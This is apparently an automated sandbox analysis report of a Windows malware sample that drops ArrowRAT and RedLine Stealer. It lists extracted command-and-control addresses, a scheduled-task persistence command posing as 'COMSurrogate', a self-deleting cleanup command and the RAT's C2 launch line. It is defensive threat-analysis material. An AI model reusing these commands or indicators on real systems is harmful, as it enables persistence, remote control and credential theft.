Analysis
-
max time kernel
120s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20220901-en -
resource tags
arch:x64arch:x86image:win10v2004-20220901-enlocale:en-usos:windows10-2004-x64system -
submitted
11-11-2022 20:10
Static task
static1
Behavioral task
behavioral1
Sample
tmp.exe
Resource
win7-20220812-en
Behavioral task
behavioral2
Sample
tmp.exe
Resource
win10v2004-20220901-en
General
-
Target
tmp.exe
-
Size
18.4MB
-
MD5
464502cbaae7b9ed1cd6da844d38ba86
-
SHA1
30dd42539cbfad04564f9db45ca40f2b9e81546c
-
SHA256
6c90b6acb49fff4969b5f5fabde4b4fea363e1902ac675ba02e7ad325804b7d4
-
SHA512
e74b45702eeaca95bc6c9f2aeea8a5958a425dc1f45ecfb127e286a39eb668243b41e56c705ae5fe7a72ff1ab691948adf29ddd6de18509421fa415647a36b59
-
SSDEEP
98304:2pgc9WBd2/ojIbrK51bnqvMwqwWhWznbdyxDDFC4B14d+iXLfg0rf2a33OXA7zTg:2pgnBkbYEMUWIzbdyxDDFCXpZU
Malware Config
Extracted
arrowrat
Client
213.239.219.58:1337
nPxRArUjc
Extracted
redline
@NoxyCloud
85.192.63.57:34210
-
auth_value
20dc074852db65a2b74addf964cf576e
Signatures
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 1 IoCs
resource yara_rule behavioral2/memory/4840-222-0x0000000000400000-0x0000000000428000-memory.dmp family_redline -
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description pid Process procid_target PID 2428 created 2376 2428 Quoko tace wesa.exe 49 -
Downloads MZ/PE file
-
Executes dropped EXE 3 IoCs
pid Process 3144 MRH.exe 2428 Quoko tace wesa.exe 3120 ROR.exe -
Modifies Installed Components in the registry 2 TTPs 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Active Setup\Installed Components explorer.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation MRH.exe -
Loads dropped DLL 1 IoCs
pid Process 2428 Quoko tace wesa.exe -
Enumerates connected drives 3 TTPs 1 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\D: explorer.exe -
Suspicious use of SetThreadContext 3 IoCs
description pid Process procid_target PID 848 set thread context of 2224 848 tmp.exe 82 PID 2428 set thread context of 2780 2428 Quoko tace wesa.exe 109 PID 2780 set thread context of 2572 2780 InstallUtil.exe 112 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 AcroRd32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz AcroRd32.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1296 schtasks.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION AcroRd32.exe -
Modifies registry class 9 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff explorer.exe Key created \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ explorer.exe Key created \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings InstallUtil.exe Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-929662420-1054238289-2961194603-1000\{DE72C25A-EC8B-459E-A4FB-594371597111} explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots explorer.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ explorer.exe Key created \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell explorer.exe Key created \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU explorer.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 960 PING.EXE -
Suspicious behavior: EnumeratesProcesses 46 IoCs
pid Process 3592 AcroRd32.exe 3592 AcroRd32.exe 3592 AcroRd32.exe 3592 AcroRd32.exe 3592 AcroRd32.exe 3592 AcroRd32.exe 3592 AcroRd32.exe 3592 AcroRd32.exe 3592 AcroRd32.exe 3592 AcroRd32.exe 3592 AcroRd32.exe 3592 AcroRd32.exe 3592 AcroRd32.exe 3592 AcroRd32.exe 3592 AcroRd32.exe 3592 AcroRd32.exe 3592 AcroRd32.exe 3592 AcroRd32.exe 3592 AcroRd32.exe 3592 AcroRd32.exe 3144 MRH.exe 3144 MRH.exe 3144 MRH.exe 3144 MRH.exe 3144 MRH.exe 3144 MRH.exe 3144 MRH.exe 3144 MRH.exe 3144 MRH.exe 3144 MRH.exe 2428 Quoko tace wesa.exe 2428 Quoko tace wesa.exe 2428 Quoko tace wesa.exe 2428 Quoko tace wesa.exe 2428 Quoko tace wesa.exe 2428 Quoko tace wesa.exe 2428 Quoko tace wesa.exe 2428 Quoko tace wesa.exe 2428 Quoko tace wesa.exe 2428 Quoko tace wesa.exe 2428 Quoko tace wesa.exe 2428 Quoko tace wesa.exe 2780 InstallUtil.exe 2780 InstallUtil.exe 2780 InstallUtil.exe 2780 InstallUtil.exe -
Suspicious use of AdjustPrivilegeToken 11 IoCs
description pid Process Token: SeDebugPrivilege 2780 InstallUtil.exe Token: SeShutdownPrivilege 2316 explorer.exe Token: SeCreatePagefilePrivilege 2316 explorer.exe Token: SeShutdownPrivilege 2316 explorer.exe Token: SeCreatePagefilePrivilege 2316 explorer.exe Token: SeShutdownPrivilege 2316 explorer.exe Token: SeCreatePagefilePrivilege 2316 explorer.exe Token: SeShutdownPrivilege 2316 explorer.exe Token: SeCreatePagefilePrivilege 2316 explorer.exe Token: SeShutdownPrivilege 2316 explorer.exe Token: SeCreatePagefilePrivilege 2316 explorer.exe -
Suspicious use of FindShellTrayWindow 7 IoCs
pid Process 3592 AcroRd32.exe 2316 explorer.exe 2316 explorer.exe 2316 explorer.exe 2316 explorer.exe 2316 explorer.exe 2316 explorer.exe -
Suspicious use of SendNotifyMessage 8 IoCs
pid Process 2316 explorer.exe 2316 explorer.exe 2316 explorer.exe 2316 explorer.exe 2316 explorer.exe 2316 explorer.exe 2316 explorer.exe 2316 explorer.exe -
Suspicious use of SetWindowsHookEx 8 IoCs
pid Process 2224 InstallUtil.exe 3592 AcroRd32.exe 3592 AcroRd32.exe 3592 AcroRd32.exe 3592 AcroRd32.exe 3592 AcroRd32.exe 3592 AcroRd32.exe 2780 InstallUtil.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 848 wrote to memory of 2224 848 tmp.exe 82 PID 848 wrote to memory of 2224 848 tmp.exe 82 PID 848 wrote to memory of 2224 848 tmp.exe 82 PID 848 wrote to memory of 2224 848 tmp.exe 82 PID 848 wrote to memory of 2224 848 tmp.exe 82 PID 848 wrote to memory of 2224 848 tmp.exe 82 PID 848 wrote to memory of 2224 848 tmp.exe 82 PID 2224 wrote to memory of 3592 2224 InstallUtil.exe 85 PID 2224 wrote to memory of 3592 2224 InstallUtil.exe 85 PID 2224 wrote to memory of 3592 2224 InstallUtil.exe 85 PID 3592 wrote to memory of 2400 3592 AcroRd32.exe 88 PID 3592 wrote to memory of 2400 3592 AcroRd32.exe 88 PID 3592 wrote to memory of 2400 3592 AcroRd32.exe 88 PID 2400 wrote to memory of 1160 2400 RdrCEF.exe 90 PID 2400 wrote to memory of 1160 2400 RdrCEF.exe 90 PID 2400 wrote to memory of 1160 2400 RdrCEF.exe 90 PID 2400 wrote to memory of 1160 2400 RdrCEF.exe 90 PID 2400 wrote to memory of 1160 2400 RdrCEF.exe 90 PID 2400 wrote to memory of 1160 2400 RdrCEF.exe 90 PID 2400 wrote to memory of 1160 2400 RdrCEF.exe 90 PID 2400 wrote to memory of 1160 2400 RdrCEF.exe 90 PID 2400 wrote to memory of 1160 2400 RdrCEF.exe 90 PID 2400 wrote to memory of 1160 2400 RdrCEF.exe 90 PID 2400 wrote to memory of 1160 2400 RdrCEF.exe 90 PID 2400 wrote to memory of 1160 2400 RdrCEF.exe 90 PID 2400 wrote to memory of 1160 2400 RdrCEF.exe 90 PID 2400 wrote to memory of 1160 2400 RdrCEF.exe 90 PID 2400 wrote to memory of 1160 2400 RdrCEF.exe 90 PID 2400 wrote to memory of 1160 2400 RdrCEF.exe 90 PID 2400 wrote to memory of 1160 2400 RdrCEF.exe 90 PID 2400 wrote to memory of 1160 2400 RdrCEF.exe 90 PID 2400 wrote to memory of 1160 2400 RdrCEF.exe 90 PID 2400 wrote to memory of 1160 2400 RdrCEF.exe 90 PID 2400 wrote to memory of 1160 2400 RdrCEF.exe 90 PID 2400 wrote to memory of 1160 2400 RdrCEF.exe 90 PID 2400 wrote to memory of 1160 2400 RdrCEF.exe 90 PID 2400 wrote to memory of 1160 2400 RdrCEF.exe 90 PID 2400 wrote to memory of 1160 2400 RdrCEF.exe 90 PID 2400 wrote to memory of 1160 2400 RdrCEF.exe 90 PID 2400 wrote to memory of 1160 2400 RdrCEF.exe 90 PID 2400 wrote to memory of 1160 2400 RdrCEF.exe 90 PID 2400 wrote to memory of 1160 2400 RdrCEF.exe 90 PID 2400 wrote to memory of 1160 2400 RdrCEF.exe 90 PID 2400 wrote to memory of 1160 2400 RdrCEF.exe 90 PID 2400 wrote to memory of 1160 2400 RdrCEF.exe 90 PID 2400 wrote to memory of 1160 2400 RdrCEF.exe 90 PID 2400 wrote to memory of 1160 2400 RdrCEF.exe 90 PID 2400 wrote to memory of 1160 2400 RdrCEF.exe 90 PID 2400 wrote to memory of 1160 2400 RdrCEF.exe 90 PID 2400 wrote to memory of 1160 2400 RdrCEF.exe 90 PID 2400 wrote to memory of 1160 2400 RdrCEF.exe 90 PID 2400 wrote to memory of 1160 2400 RdrCEF.exe 90 PID 2400 wrote to memory of 1160 2400 RdrCEF.exe 90 PID 2400 wrote to memory of 1160 2400 RdrCEF.exe 90 PID 2400 wrote to memory of 3136 2400 RdrCEF.exe 91 PID 2400 wrote to memory of 3136 2400 RdrCEF.exe 91 PID 2400 wrote to memory of 3136 2400 RdrCEF.exe 91 PID 2400 wrote to memory of 3136 2400 RdrCEF.exe 91 PID 2400 wrote to memory of 3136 2400 RdrCEF.exe 91 PID 2400 wrote to memory of 3136 2400 RdrCEF.exe 91 PID 2400 wrote to memory of 3136 2400 RdrCEF.exe 91 PID 2400 wrote to memory of 3136 2400 RdrCEF.exe 91 PID 2400 wrote to memory of 3136 2400 RdrCEF.exe 91 PID 2400 wrote to memory of 3136 2400 RdrCEF.exe 91
Processes
-
C:\Windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}1⤵PID:2376
-
C:\Users\Admin\AppData\Local\Temp\tmp.exe"C:\Users\Admin\AppData\Local\Temp\tmp.exe"1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:848 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"2⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2224 -
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\Invoice.pdf"3⤵
- Checks processor information in registry
- Modifies Internet Explorer settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3592 -
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=165140434⤵
- Suspicious use of WriteProcessMemory
PID:2400 -
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=D1A32B0FF9FEE30EF866219D17F35A8A --mojo-platform-channel-handle=1736 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:25⤵PID:1160
-
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=76235904D0D319AF3994BFE77FFEC537 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=1 --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=76235904D0D319AF3994BFE77FFEC537 --renderer-client-id=2 --mojo-platform-channel-handle=1748 --allow-no-sandbox-job /prefetch:15⤵PID:3136
-
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=2BBE79CCB81E0652D8CDD8046EB335BA --mojo-platform-channel-handle=2308 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:25⤵PID:1944
-
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=308D3CA27557840012F9B5B415F097B4 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=1 --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=308D3CA27557840012F9B5B415F097B4 --renderer-client-id=5 --mojo-platform-channel-handle=2332 --allow-no-sandbox-job /prefetch:15⤵PID:1196
-
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=64EC4B0EE101446867FFC9CF1C0E8EDB --mojo-platform-channel-handle=1844 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:25⤵PID:4044
-
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=9F3E6E81539061B6CE6FB00F4C08C931 --mojo-platform-channel-handle=2104 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:25⤵PID:3644
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\MRH.exe"C:\Users\Admin\AppData\Local\Temp\MRH.exe" 03⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious behavior: EnumeratesProcesses
PID:3144 -
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /tn COMSurrogate /f /sc onlogon /rl highest /tr "C:\Users\Admin\Yisike quoquola fika quaveb\Quoko tace wesa.exe"4⤵
- Creates scheduled task(s)
PID:1296
-
-
C:\Users\Admin\Yisike quoquola fika quaveb\Quoko tace wesa.exe"C:\Users\Admin\Yisike quoquola fika quaveb\Quoko tace wesa.exe" 04⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
PID:2428 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"5⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:2780 -
C:\Windows\explorer.exe"C:\Windows\explorer.exe"6⤵
- Modifies Installed Components in the registry
- Enumerates connected drives
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2316
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Client 213.239.219.58 1337 nPxRArUjc6⤵PID:4124
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Client 213.239.219.58 1337 nPxRArUjc6⤵PID:2572
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c chcp 65001 && ping 127.0.0.1 && DEL /F /S /Q /A "C:\Users\Admin\AppData\Local\Temp\MRH.exe"4⤵PID:2516
-
C:\Windows\SysWOW64\chcp.comchcp 650015⤵PID:492
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.15⤵
- Runs ping.exe
PID:960
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\ROR.exe"C:\Users\Admin\AppData\Local\Temp\ROR.exe" 03⤵
- Executes dropped EXE
PID:3120 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"4⤵PID:4840
-
-
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:3932
-
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca1⤵PID:4072
-
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca1⤵PID:1952
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
717B
MD5ec8ff3b1ded0246437b1472c69dd1811
SHA1d813e874c2524e3a7da6c466c67854ad16800326
SHA256e634c2d1ed20e0638c95597adf4c9d392ebab932d3353f18af1e4421f4bb9cab
SHA512e967b804cbf2d6da30a532cbc62557d09bd236807790040c6bee5584a482dc09d724fc1d9ac0de6aa5b4e8b1fff72c8ab3206222cc2c95a91035754ac1257552
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751
Filesize192B
MD5ce97a3784f0bc39784ef388c0e82099e
SHA1863ac930ccb0f4dffbd3247b8bdc4273b9bcdcf6
SHA256b3b7bb3b695629872f3390628cb649ec6c464a92b8c383e299474dcf54914eaa
SHA512a48e31c090b2300b42893c0899d93f0e823c1b7c48880bb89381786beeb87255a53d94a8f49a7fb110cf2c55ed7b0a3d00c6e1bc946a48820da9cf470424a833
-
Filesize
259KB
MD594aafe6b249b7f529f9d66a6f7d0b80e
SHA1a83eee4aa9c936a8e423c4b2b7d2b1036a9a0c44
SHA25641c631caa7c9e95166917bec39627c488400d180622e4b2bb3a3629732692b54
SHA512e94befd6c2462bbab13e0e66569c78d34d075f15a9923713f9e72bbd7f791103ef20161b7f830a9ad1f2745ccd9e60bbbe7540f87c025d3be4b0dba3d546d5cb
-
Filesize
163KB
MD55441d36f8dcfdd31e75562b380bea7a8
SHA170053ce7491743efacaa4b40f452efb3f32df4e8
SHA25658098a6f25d3fb423b49a97cf917a406c5841d7ac792ef04ecb9646f5629baf3
SHA51206a19ace54e2ccb25faaba3dce7a4b72010d1002efbd5d3e1cab1f23493dd8ada55803e9cd695a79c6030204224a84c5192b334b2e8c1007713e1f472f645bbe
-
Filesize
1.9MB
MD518585735c8866b21e2723a6f020bafd0
SHA1afb5b2c9d5ca57501835b0c56fd97b0641f01d88
SHA256e9c817d02acaf2fbb59a0a44be05dbb284ee622f50b2e2a598daac8bfb564672
SHA51288516af4bbbd9562a9ae9840124c6f9f1402f9a15a0ace5e2413023bbd80c37aa441cc39b8b48f8ca58f4192273e16cd590cd2e9e9a4298f6ed5b0497d54e6b8
-
Filesize
1.9MB
MD518585735c8866b21e2723a6f020bafd0
SHA1afb5b2c9d5ca57501835b0c56fd97b0641f01d88
SHA256e9c817d02acaf2fbb59a0a44be05dbb284ee622f50b2e2a598daac8bfb564672
SHA51288516af4bbbd9562a9ae9840124c6f9f1402f9a15a0ace5e2413023bbd80c37aa441cc39b8b48f8ca58f4192273e16cd590cd2e9e9a4298f6ed5b0497d54e6b8
-
Filesize
1.7MB
MD585ea4565608d2f6c35decb6ed8547749
SHA1e15ae6c93c9e998b030609fdf4b3274925694229
SHA256f6706aafbeb4e8e10478bb1fd5b171e2f7f13399416344aba46233593e6f5d69
SHA512762b5e5293067c484ca54fa297f5770217275a7594083b64b15ed65955f64ba158bbf58a7713419c2dc15d265a7bf8c85b4f11c8fd27e62ba21f429493df4dd5
-
Filesize
1.7MB
MD585ea4565608d2f6c35decb6ed8547749
SHA1e15ae6c93c9e998b030609fdf4b3274925694229
SHA256f6706aafbeb4e8e10478bb1fd5b171e2f7f13399416344aba46233593e6f5d69
SHA512762b5e5293067c484ca54fa297f5770217275a7594083b64b15ed65955f64ba158bbf58a7713419c2dc15d265a7bf8c85b4f11c8fd27e62ba21f429493df4dd5
-
Filesize
262KB
MD51b51fec95f5403305749c4bcb3485b14
SHA1f4974196213a94911c850504924f38cd9e7fe889
